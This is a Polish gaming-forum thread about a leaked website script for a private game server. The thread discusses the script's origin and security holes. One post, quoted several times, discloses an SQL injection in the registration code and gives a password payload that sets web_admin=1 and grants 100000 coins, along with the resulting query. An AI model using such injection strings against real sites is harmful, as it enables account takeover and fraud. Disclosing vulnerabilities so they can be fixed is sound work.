Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Strona serwera Avestia.pl(Lepsza grafika, lepszy skrypt) :)


Rekomendowane odpowiedzi

Opublikowano

Nie wiem czy ktoś już stwierdził obecność dziury. Wziąłem sobie sól z haseł bo jakiś gość stawia serwa i poprosił mnie bym mu pod inne skrypty naprawił reje.

Dziura jest choćby w reje:

 

safe_sql("INSERT INTO ".$config['db_account'].".account SET
                Login = '".$r_login."',
                password = PASSWORD('".$r_pass."'),
                email = '".$r_email."',
                social_id = '1234567',  
                cash = '".$cash."',
                create_time = '".$date."',
                sid_register='".$key."',
                ".$sql_ref."
                status='OK' ");

Hasło nie jest zabezpieczone. Dajmy, że użyjemy hasła takiego:

 

kongo'), web_admin=1, coins=100000, address=PASSWORD('lo

Zapytanie wyglądać będzie tak (przykładowo):

 

INSERT INTO account.account SET
                Login = 'Kongo',
                password = PASSWORD('kongo'), web_admin=1, coins=100000, address=PASSWORD('loţ÷'),
                email = '[email protected]',
                social_id = '1234567',  
                cash = '0',
                create_time = '1970-00-00 00:00:00',
                sid_register='blabla',
                status='OK'

 

Powyższy kod jest tylko w celu informacyjnym!

Nie odpowiadam za szkody powstałe poprzez publikację tego postu.

  • Odpowiedzi 80
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Nie wiem czy ktoś już stwierdził obecność dziury. Wziąłem sobie sól z haseł bo jakiś gość stawia serwa i poprosił mnie bym mu pod inne skrypty naprawił reje.

Dziura jest choćby w reje:

safe_sql("INSERT INTO ".$config['db_account'].".account SET
                Login = '".$r_login."',
                password = PASSWORD('".$r_pass."'),
                email = '".$r_email."',
                social_id = '1234567',  
                cash = '".$cash."',
                create_time = '".$date."',
                sid_register='".$key."',
                ".$sql_ref."
                status='OK' ");

Hasło nie jest zabezpieczone. Dajmy, że użyjemy hasła takiego:

kongo'), web_admin=1, coins=100000, address=PASSWORD('lo

Zapytanie wyglądać będzie tak (przykładowo):

INSERT INTO account.account SET
                Login = 'Kongo',
                password = PASSWORD('kongo'), web_admin=1, coins=100000, address=PASSWORD('loţ÷'),
                email = '[email protected]',
                social_id = '1234567',  
                cash = '0',
                create_time = '1970-00-00 00:00:00',
                sid_register='blabla',
                status='OK'

Powyższy kod jest tylko w celu informacyjnym!

Nie odpowiadam za szkody powstałe poprzez publikację tego postu.

 

Kolego tutaj jak by wypisać wszystkie błędy/dziury skryptów to by nam zabrakło miejsca na forum xD

1390144171-U592769.png


Opublikowano

Wiem rozumiem, też nie przekopywałem tego ale pamiętam że coś w rankingu było nie tak [ nie domykało funkcji czy coś, nie pamiętam już ]

 

o.O tutaj też ta strona albo tylko skrypt był :

 

$mailheader  = "FROM: Itanos.pl <[email protected]> \n";
$mailheader .= "MIME-Version: 1.0\n";
$mailheader .= "Content-Type: text/html;\n";
$mailheader .= "\tcharset=\"UTF-8\"\n";

1390144171-U592769.png


Opublikowano

Widzę, że największą popularnością cieszy się to co zostało skradzione ... 


 


@topic


 


Przynajmniej ss by się przydał, ale i tak nie pobiorę.


da5e9f82fbb05240438e374847f4a6f9.gif

Opublikowano

Nie wiem czy ktoś już stwierdził obecność dziury. Wziąłem sobie sól z haseł bo jakiś gość stawia serwa i poprosił mnie bym mu pod inne skrypty naprawił reje.

Dziura jest choćby w reje:

safe_sql("INSERT INTO ".$config['db_account'].".account SET
                Login = '".$r_login."',
                password = PASSWORD('".$r_pass."'),
                email = '".$r_email."',
                social_id = '1234567',  
                cash = '".$cash."',
                create_time = '".$date."',
                sid_register='".$key."',
                ".$sql_ref."
                status='OK' ");

Hasło nie jest zabezpieczone. Dajmy, że użyjemy hasła takiego:

kongo'), web_admin=1, coins=100000, address=PASSWORD('lo

Zapytanie wyglądać będzie tak (przykładowo):

INSERT INTO account.account SET
                Login = 'Kongo',
                password = PASSWORD('kongo'), web_admin=1, coins=100000, address=PASSWORD('loţ÷'),
                email = '[email protected]',
                social_id = '1234567',  
                cash = '0',
                create_time = '1970-00-00 00:00:00',
                sid_register='blabla',
                status='OK'

Powyższy kod jest tylko w celu informacyjnym!

Nie odpowiadam za szkody powstałe poprzez publikację tego postu.

Przed tym jest zabezpieczona, można tylko litery i liczby wpisywać.

Opublikowano

Jest to strona stara serwera Dreikon (Pierszy serwer jaki ją miał był to Shain) lekko grafika zmieniona.

Stronę Dreikona miałem już dawno i ma kilka dziurek, tak samo ta ma dziurki takie same skrypty by Zielsko <-- samo o sobie mówi.

Zielsko za dobry w kodowaniu nie jest, ale grafikę tworzy wyśminitą :)

Opublikowano

Jest to strona stara serwera Dreikon (Pierszy serwer jaki ją miał był to Shain) lekko grafika zmieniona.

Stronę Dreikona miałem już dawno i ma kilka dziurek, tak samo ta ma dziurki takie same skrypty by Zielsko <-- samo o sobie mówi.

Zielsko za dobry w kodowaniu nie jest, ale grafikę tworzy wyśminitą :)

I co sensualku? Wydałeś się :D Algoria padła przez bug w is i teraz się wydałeś heh. Zaraz bedziesz mnie cisnął i hejtował. Czekam.

Opublikowano

I co sensualku? Wydałeś się :D Algoria padła przez bug w is i teraz się wydałeś heh. Zaraz bedziesz mnie cisnął i hejtował. Czekam.

 

Jak to nie Sensual :x a po drugie bug w is był pomyłką poprawiania skryptu nocą :)

competitions,proportional,456,186,36a24f

Opublikowano

I co sensualku? Wydałeś się :D Algoria padła przez bug w is i teraz się wydałeś heh. Zaraz bedziesz mnie cisnął i hejtował. Czekam.

 

Co to jest za łeb, omg.

 

/Aw

Co do strony, Zielsko pierwotnie robił ją dla tamtego serwera, później była sprzedana i tak się rozeszło lecz nigdy nie została opublikowna do wczorajszego dnia ze zmienioną grafiką.

Dowód -->

 

 

Opublikowano

Jest to strona stara serwera Dreikon (Pierszy serwer jaki ją miał był to Shain) lekko grafika zmieniona.

Stronę Dreikona miałem już dawno i ma kilka dziurek, tak samo ta ma dziurki takie same skrypty by Zielsko <-- samo o sobie mówi.

Zielsko za dobry w kodowaniu nie jest, ale grafikę tworzy wyśminitą :)

 

I tu się z tobą zgadzam w 100% :)

1390144171-U592769.png


Specjalista
Opublikowano

Jest jakieś demo ??

Lub ma ktoś ss-a tej strony ??

Pozdrawiam. 

Pomogłeś,pomogę kiedy tylko brachu mogę!

 

graphic.png

 

Opublikowano

wedlug mnie ta strona powinna juz zniknal a temat powinien byc zamkniety bo tylko niepotrzebny spam jest a strona dziurawa i np ja to wolalbym uzyc derina bo tej to strach na hamaachi wgrywac

Opublikowano

Strona sama w sobie ma trochę dziur ale jakby ktoś chciał to by mógł sobie to wszystko połatać tylko nie ma zawsze tej pewności że wszystko :)

Moim zdaniem lepiej zwrócić się do osoby która się zna i wybulić trochę hajsu i mieć swoją stronę.

Macie SS:

 

bwekhy.jpg

 

Opublikowano

Zakodowana pod IS ?

Z tego co patrzałem to IS jest lecz prosi o wpisanie hasła które zawsze jest nieprawidłowe więc trzeba sobie to naprawić :)

Opublikowano

Hmm piszecie że dziurawa i dziurawa ale żaden z hejterów nie powiedział jaka to dziura, nie udowodnił a piszecie..

Sprawdźcie czy jest dziurawa, pokażcie chociaż jedną dziurę i potem piszcie że dziurawa bo powiem wam tak że ja za niedługo ją sprawdzę i zobaczymy czy ma jakieś dziury..

Powiem wam jeszcze tak że bez dowodów na ów dziury pisane przez was to takie pisanie jest bezsensu -.-

Co do strony no wygląd ładny i no łatwo można też poprawić ten wygląd :)

 

Pozdrawiam.

Pomogłem ? klik up to Like ;D ( Lubię to ! ) xD

300 postów-> 10.10.2013 godz. 9:00
400 postów-> 19.10.2013 godz. 9:00

 

Specjalista
Opublikowano

Jak grafika jest chociaż przyzwoita to można od 0 ją zakodować i cieszyć się stronką xD.

A pocięta chyba już jest,więc co to za problem dla kogoś kto się zna na tym.

Pozdrawiam.

Pomogłeś,pomogę kiedy tylko brachu mogę!

 

graphic.png

 

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...